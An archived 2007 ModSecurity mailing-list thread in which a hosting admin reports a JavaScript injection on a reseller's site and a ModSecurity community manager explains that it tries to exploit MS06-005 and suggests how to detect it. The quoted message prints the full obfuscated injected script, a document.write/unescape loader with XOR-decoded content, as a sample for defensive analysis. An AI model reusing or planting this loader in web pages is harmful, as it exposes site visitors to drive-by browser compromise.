<div><font color="#000000">This malicious JS is attempting to have the client's browser make multiple requests to loop through a few systems and <font size="2">eventually tries to exploit the MS06-005 vulnerability - </font>
</font><a title="http://www.microsoft.com/technet/security/Bulletin/MS06-005.mspx" href="http://www.microsoft.com/technet/security/Bulletin/MS06-005.mspx"><font color="#000000" size="2">http://www.microsoft.com/technet/security/Bulletin/MS06-005.mspx
</font></a><font color="#000000" size="2"> by downloading a specially crafted WMV file.</font></div>
<div><font size="2"></font> </div>
<div><font size="2">Now, to answer you questions -</font></div>
<div><font size="2">1) You need to try and identify how this JS code was added to the html page. Was it uploaded through the website in a comment form/blog post, etc...? Or was it added by a local user who could have uploaded a new html page or edited the file locally from a command shell on the web server? In the former case, if you have the ModSecurity SecAuditEngine turned On, then you can do some quick grepping through the audit logs to identify any transactions that have this data present.
</font></div>
<div><font size="2"></font> </div>
<div><font size="2">2) As for ModSecurity rules, the Core Rules (<a href="http://www.modsecurity.org/projects/rules/index.html">http://www.modsecurity.org/projects/rules/index.html</a>) have numerous rules that will identify clients who are attempting to upload this type of malicious code. Identifying/blocking this type of data going OUTBOUND in the html sent to clients is a bit more difficult. See this recent OWASP presentation on Crimeware -
<a href="http://www.owasp.org/images/8/83/OWASP_IL_8_Evasive_Crimeware_attacks_Business_drivers_and_Proposed.pdf">http://www.owasp.org/images/8/83/OWASP_IL_8_Evasive_Crimeware_attacks_Business_drivers_and_Proposed.pdf</a>
. Breach is working on rules to help identify this type of malicious code to help hosting environments. Check out the <a href="http://www.modsecurity.org">www.modsecurity.org</a> site for details.</font> </div>
<div> </div>
<div>-- <br>Ryan C. Barnett<br>ModSecurity Community Manager<br>Breach Security: Director of Application Security Training<br>Web Application Security Consortium (WASC) Member<br>CIS Apache Benchmark Project Lead <br>SANS Instructor, GCIA, GCFA, GCIH, GSNA, GCUX, GSEC
<br>Author: Preventing Web Attacks with Apache </div>
<div> </div>
<div><br>---------- Forwarded message ----------<br><span class="gmail_quote">From: <b class="gmail_sendername"><a onclick="return top.js.OpenExtLink(window,event,this)" href="mailto:admin@efastservers.com" target="_blank">
admin@efastservers.com</a></b> <<a onclick="return top.js.OpenExtLink(window,event,this)" href="mailto:admin@efastservers.com" target="_blank"> admin@efastservers.com</a>><br>Date: Oct 8, 2007 12:48 PM<br>Subject: [Modsecurity] Some type of file injection vuln going around
<br>To: <a onclick="return top.js.OpenExtLink(window,event,this)" href="mailto:modsecurity@gotroot.com" target="_blank">modsecurity@gotroot.com</a><br><br> </span></div>
<div lang="EN-US" link="blue" vlink="purple">
<div>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">One of my resellers contacted me today stating that one of his websites was hacked and possibly the server. He wanted to know what we were going to do about it.
</span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">I checked the server but no other website is affected except for two of his own websites.</span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"> </span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">There seems to be some type of javascript file injection vuln going around. I searched the logs but could not find anything obvious in his logs. I checked all sites and they are clean.
</span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"> </span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">Here is what was injected into his index.html file after the <header> tag.</span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"> </span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"></html> <!--[z0s]--><script>do
</span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">cument.write(unescape("%3Cscript%3Eif%28wA%21%3D1%29%7Bfunction%20Qg%28gx%29%7Breturn%20gx%7Dtry%7Bfunction%20UNc%28IDB%29%7Br</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">eturn%20parseInt%28IDB%29%7Dvar%20zmW%3D%27aavalvaLvahvaSvanvagvaIva9vaRvaMvaivaxvaCvadvajvaova7vaVvaJvaOvabvaHvamvawvaevaWvaN</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">vakvazva6vaYvatvaXvaPvaUvapvaFva3vaBvayvaqvafvarvaZvacvaDvaTvaGva5vasva4va8vaKvlavllvlLvlhvlSvlnvlgvlIvl9vlRvlMvlivlxvlCvldvlj</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">vlovl7vlVvlJvlOvlbvlHvlmvlw%27%3Bvar%20uNq%3DQg%28%27v%27%29%2CHCR%3DArray%2827751%5E27867%2CUNc%28%27243%27%29%2CUNc%28%27227</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">%27%29%2CUNc%28%27242%27%29%2CUNc%28%27233%27%29%2C9751%5E9959%2CUNc%28%27244%27%29%2CUNc%28%27190%27%29%2CUNc%28%27230%27%29%</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">2CUNc%28%27245%27%29%2C10675%5E10589%2C936%5E839%2C21887%5E21983%2CUNc%28%27210%27%29%2C21801%5E22001%2C21825%5E21993%2C5220%5</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">E5301%2CUNc%28%27201%27%29%2C22845%5E22929%2CUNc%28%27202%27%29%2C16044%5E15945%2CUNc%28%27169%27%29%2CUNc%28%27251%27%29%2C10</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">351%5E10393%2CUNc%28%27225%27%29%2CUNc%28%27204%27%29%2C10454%5E10245%2CUNc%28%27189%27%29%2CUNc%28%27247%27%29%2C4863%5E4667%</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">2C29566%5E29637%2CUNc%28%27206%27%29%2CUNc%28%27226%27%29%2C15905%5E16015%2C32317%5E32489%2C618%5E647%2C32760%5E32543%2CUNc%28</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">%27171%27%29%2CUNc%28%27184%27%29%2CUNc%28%27182%27%29%2C20297%5E20477%2CUNc%28%27176%27%29%2CUNc%28%27228%27%29%2CUNc%28%2723</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">5%27%29%2CUNc%28%27162%27%29%2CUNc%28%27248%27%29%2CUNc%28%27199%27%29%2CUNc%28%27205%27%29%2CUNc%28%27253%27%29%2CUNc%28%2719</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">5%27%29%2C30514%5E30613%2CUNc%28%27177%27%29%2CUNc%28%27250%27%29%2C15088%5E14857%2CUNc%28%27213%27%29%2CUNc%28%27236%27%29%2C</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">UNc%28%27197%27%29%2CUNc%28%27175%27%29%2CUNc%28%27232%27%29%2CUNc%28%27207%27%29%2CUNc%28%27173%27%29%2CUNc%28%27186%27%29%2C</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">UNc%28%27161%27%29%2C9002%5E9109%2C2844%5E3015%2C11165%5E11075%2C31322%5E31459%2C7836%5E7745%2CUNc%28%27220%27%29%2CUNc%28%271</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">93%27%29%2C3893%5E3975%2C20421%5E20231%2CUNc%28%27138%27%29%2CUNc%28%27217%27%29%2C24184%5E24243%2CUNc%28%27179%27%29%2CUNc%28</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">%27181%27%29%2CUNc%28%27183%27%29%2C6089%5E5987%29%3Bvar%20CVS%2ClXs%3Bvar%20QVT%2CMKq%3D%27aaalaLahaSanagaIa9aRaMaLagaSaiaMax</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">aCadajaoa7aVaJaOabaHaxamawahaxaeaWaNaMaOakaxazawagaOajaba6amawahaxaxaYataNaxaMaOakaxazawagaOajaba6axaYataXalaOagaPaSaUaOajaeaW</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">aXapaOagaPaSaUaOajabaFa3aBayaqaqaqaqaqaba6axafaiaLaRaUaOaMagaXaLaiaiaraSaOaxaNaxaoa7aFaZaNaZaFaOalaLawanaOajaJaOabaFaZa6aOacan</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">aSahaOalaNaZaFaYataXagaiaDaTaPaWagahaSaMapajaba6axaGamawahaxaRa5aNasala4a9a5a8asaVaWaKaNasa4asa6amawahaxadlaaNasaRanafawagaOa4</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">aXaLllawalalaSaLagaOllaXaiahapasaVaOlLaNaslhlSagaUlllhasa6aSa9ajafaiaLaRaUaOaMagaXaLaiaiaraSaOaXaSaMafaOaclna9ajaRa5aFasaNasaF</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">aWaKabaxaNaNlga4abaHamawahaxaflllSaNafaiaLaRaUaOaMagaXllaiaLawagaSaiaMaXlSaialaga6amawahaxlSaraNaxaslSagasaFasaganlIasaFaslhlh</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">asaFajaxaflllSaxl9aNaxasaslRasaslIaWlaajababaxaFaxaflllSaXahaOanllawaLaOaxajlhlMliawlga8aqlglxaXlglClhaVasaXasabaXahaOanllawaL</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">aOaxajlhldaXaFlhaVasaXasabaFasaXasaFaWlaajabaxaFasaXasaxaFaxadlaaFaOlLa6amawahaxaDaRaNafaiaLaRaUaOaMagaXaLahaOawagaOlLllaOaUaO</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">aMagajasaSa9ahawaUaOasaba6aDaRaXalaOagljagagahaSataRagaOaxajasalahaLasaVaxlSaraba6aDaRaXlSaOaSaplSagaNa4a6aDaRaXakaSafaglSaNlo</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">a6aDaRaXa9ahawaUaOl7aiahafaOahaxaNaxaqa6axagahaKaHaxafaiaLaRaUaOaMagaXataiafaKaXawananaOaMafa5lSaSllafaxajaxaDaRaba6axaCadajaR</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">a5aVaxaWaKaxaba6aGaxaLawagaLlSajaOabaxaHafaiaLaRaUaOaMagaXakahaSagaOaxajasaalSagaUllaIaaataiafaKaIaalhataiafaKaIaalhlSagaUllaI</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">asaba6axafaiaLaRaUaOaMagaXataiafaKaXawananaOaMafa5lSaSllafaxajaxaDaRaba6aCadaxajaxaRa5aVaWaKabaxa6aGaxaGlVa9aRaMaLagaSaiaMaxaW</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">laajabaHaxamawahaxlJlOaNloayaVamaoaNaZaqa4lolbaylHaBlma3lxaqawataLafaOa9aZa6amawahaxafazaNaZaZa6axa9aiahajatagaNaqa6axatagaxaa</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">axlJlOa6axatagaFaFabaxafazaFaNaxamaoaXalaRatalagahajaTawaglSaXa9llaiaiahajaTawaglSaXahawaMafaiaUajablwamaoaXllaOaMapaglSabaVa4</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">aVa4aba6axahaOagaRahaMaxafaza6axaGaalhalaLahaSanagaI%27%3Bvar%20Hui%3DString%28%29%3BzmW%3DzmW.split%28uNq%29%3Bfor%20%28CVS%3</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">D0%3BCVS%3CMKq.length%3BCVS+%3D2%29%7BQVT%3DMKq.substr%28CVS%2C2%29%3Bfor%28lXs%3D0%3BlXs%3CzmW.length%3BlXs++%29%7Bif%28zmW%5</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">BlXs%5D%3D%3DQVT%29break%3B%7DHui+%3DString.fromCharCode%28HCR%5BlXs%5D%5E128%29%3B%7Ddocument.write%28Hui%29%3B%7Dcatch%28VMj</span></font>
</p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">%29%7B%7D%7Dvar%20wA%3D1%3C/script%3E"))</script><!--[/z0s]--></span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"> </span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">There is a small discussion about this at <a onclick="return top.js.OpenExtLink(window,event,this)" href="http://groups.google.com/group/stopbadware/browse_thread/thread/69bac2aaac70e4d5/26405b950d361a23" target="_blank">
http://groups.google.com/group/stopbadware/browse_thread/thread/69bac2aaac70e4d5/26405b950d361a23</a></span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"> </span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">Is there a mod_sec rule that can stop this?</span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"> </span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">Thanks</span></font></p></div></div><br>_______________________________________________<br>Modsecurity mailing list<br><a onclick="return top.js.OpenExtLink(window,event,this)" href="mailto:Modsecurity@gotroot.com" target="_blank">
Modsecurity@gotroot.com</a><br><a onclick="return top.js.OpenExtLink(window,event,this)" href="http://lists.gotroot.com/mailman/listinfo/modsecurity" target="_blank">http://lists.gotroot.com/mailman/listinfo/modsecurity</a>
<br>